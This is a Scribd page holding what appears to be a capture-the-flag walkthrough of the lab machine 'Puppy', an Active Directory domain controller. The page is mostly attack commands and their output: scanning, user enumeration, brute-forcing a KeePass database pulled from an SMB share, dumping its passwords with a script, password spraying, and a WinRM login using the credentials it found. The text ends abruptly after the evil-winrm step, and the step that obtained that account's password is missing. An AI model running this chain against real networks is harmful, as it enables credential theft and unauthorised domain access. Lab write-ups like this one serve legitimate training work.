Scribd
Upload
159 views9 pages

Puppy

The document details a penetration testing process against a Windows Server 2022 with the IP address 10.10.11.70, utilizing tools like Nmap, CrackMapExec, and BloodHound for enumeration and exploitation. It includes steps for scanning the server, gathering user credentials, and performing password spraying to gain access to the system. The process culminates in extracting sensitive data from a KeePass database and leveraging it for further access and privilege escalation within the Active Directory environment.

Uploaded by

yummy.sempai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
159 views9 pages

Puppy

The document details a penetration testing process against a Windows Server 2022 with the IP address 10.10.11.70, utilizing tools like Nmap, CrackMapExec, and BloodHound for enumeration and exploitation. It includes steps for scanning the server, gathering user credentials, and performing password spraying to gain access to the system. The process culminates in extracting sensitive data from a KeePass database and leveraging it for further access and privilege escalation within the Active Directory environment.

Uploaded by

yummy.sempai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

nmap -A 10.10.11.

70 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 15:22 EDT
Nmap scan report for 10.10.11.70
Host is up (0.036s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-
20 02:22:53Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1
open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2019|2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (87%), Windows Server
2019 (85%), Microsoft Windows Server 2022 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2025-05-20T02:24:54
|_ start_date: N/A

TRACEROUTE (using port 139/tcp)


HOP RTT ADDRESS
1 38.28 ms 10.10.14.1
2 38.26 ms 10.10.11.70

OS and Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.87 seconds

sudo crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --users

SMB 10.10.11.70 445 DC [*] Windows Server 2022


Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+]
PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [+] Enumerated domain
user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm
badpwdcount: 4 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper
badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams
badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver
badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards
badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james
badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt
badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest
badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator
badpwdcount: 0 desc: Built-in account for administering the computer/domain

echo "10.10.11.70 DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts

collect username

nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep


"SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

cat users.txt

Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

add DNS
cat /etc/resolv.conf
domain www.tendawifi.com
search www.tendawifi.com
nameserver 10.0.2.3
nameserver 10.10.11.70

bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d


PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)


INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication.
Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 18S

Our user has GenericWrite permission for the Developers group, but we can't continue with
that, so we'll dig deeper.
We will see a list of available file shares with crackmapexec

smbclient \\\\10.10.11.70\\DEV -U "levi.james"


Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025

smb: \> get recovery.kdbx


getting file \recovery.kdbx of size 2677 as recovery.kdbx (22.0 KiloBytes/sec)
(average 2.1 KiloBytes/sec)

sudo apt install keepassxc

wget
https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh

chmod +x keepass4brute.sh
./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt


keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 39 - Estimated time


remaining: 36 weeks, 3 days
[+] Current attempt: liverpool

[*] Password found: liverpool

we found liverpool password


we will extract the passwords and data in the recovery.kdbx file in XML format to the
keepass_dump.xml file

keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml

Extracting usernames and passwords from XML export with the script KeePass

cat keepass_extract.py

import xml.etree.ElementTree as ET

# Parse the XML file


tree = ET.parse('keepass_dump.xml')
root = tree.getroot()

# Iterate through each 'Entry'


for entry in root.iter('Entry'):
username = None
password = None

for string in entry.findall('String'):


key = string.find('Key').text
value = string.find('Value').text

if key == 'UserName':
username = value
elif key == 'Password':
password = value

if username or password:
print(f"User: {username}, Password: {password}")

We extract the passwords and save them to the passwords_only.txt file.

python3 script.py | awk -F'Password: ' '{print $2}' > passwords_only.txt

cat passwords_only.txt

JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!

We do password spraying with crackmapexec

crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-


success

SMB 10.10.11.70 445 DC [+]


PUPPY.HTB\ant.edwards:Antman2025!

bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d


PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication.
Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 17S

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get


writable --detail

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get


writable --detail | grep -A 20
"distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get


writable --detail | grep -E "di
stinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10

evil-winrm -i xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'

You might also like